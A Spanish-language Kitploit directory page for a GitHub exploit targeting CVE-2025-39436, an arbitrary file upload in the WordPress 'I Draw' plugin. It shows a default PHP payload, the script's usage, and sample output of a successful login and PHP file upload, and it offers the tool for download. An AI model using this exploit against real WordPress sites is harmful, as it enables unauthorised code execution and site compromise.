Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-39436 — El plugin I Draw de WordPress <= 1.0 es vulnerable a la subida arbitraria de archivos. | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-39436
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-39436

CVE-2025-39436

El plugin I Draw de WordPress <= 1.0 es vulnerable a la subida arbitraria de archivos.

Ver Repositorio
32hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 Explotación del Plugin de WordPress: CVE-2025-39436

📝 Descripción

Existe una vulnerabilidad de Carga Sin Restricciones de Archivos con Tipo Peligroso en el plugin "I Draw" de WordPress. Este exploit permite a los atacantes subir archivos maliciosos sin restricción. El problema afecta a las versiones de I Draw hasta la 1.0.


🛠️ Detalles del Exploit

El exploit aprovecha la funcionalidad de carga de archivos del plugin para ejecutar un payload PHP. A continuación se muestra el payload predeterminado utilizado:

root@kitploit:~
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"

🚀 Uso

root@kitploit:~
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target website URL
  -un, --username USERNAME
                        Username
  -p, --password PASSWORD

💻 Ejemplo de Salida del Script

root@kitploit:~
[✅] Login successful.
[🍪] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] File uploaded successfully:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php

⚠️ Descargo de Responsabilidad

Este script se proporciona solo con fines educativos. El autor no asume ninguna responsabilidad por el mal uso o los daños causados por este exploit. Úsalo bajo tu propio riesgo.


Por: Nxploited ( Khaled Alenazi )

Descargar herramienta